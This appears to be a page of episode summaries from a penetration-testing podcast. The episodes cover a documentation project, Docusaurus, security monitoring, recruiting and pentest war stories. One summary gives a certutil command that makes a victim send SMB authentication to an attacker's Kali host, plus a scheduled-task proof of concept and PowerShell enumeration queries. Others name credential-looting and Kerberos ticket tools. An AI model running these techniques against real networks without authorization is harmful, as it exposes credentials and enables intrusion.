7MS #636: A Prelude to BPATTY(RELOADED)
Artificial hype alert! I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It’s weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).
12 Aug 202411min
7MS #635: Eating the Security Dog Food - Part 7
Today we’re talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
3 Aug 202445min
7MS #634: Tales of Pentest Pwnage - Part 60
Hi, today’s tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
26 Jul 202432min
7MS #633: How to Create a Security Knowledgebase with Docusaurus
Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include: docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site
19 Jul 202414min
7MS #632: Tales of Pentest Pwnage – Part 59
Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps. Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!
12 Jul 202448min
7MS #631: Tales of Pentest Pwnage – Part 58
Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket
7 Jul 202415min
7MS #630: Epic Road Trip Served with Security Sprinkles
Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some internal pentest tips that have given us some gold in recent assessments Super fast, spoiler-free movie reviews of Roadhouse, Arcadian, Late Night with the Devil and The Coffee Table
1 Jul 202445min
7MS #629: Interview with Stu Musil of Ambient Consulting
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re interested in? What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn’t even have a LinkedIn page, that’s probably a red flag) Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a “hobbies and interests” section still a good idea on a resume (to show them you’re not a robot who works 24/7)? Lets talk about some horror and/or success stories from the world of recruiting!
24 Jun 202446min
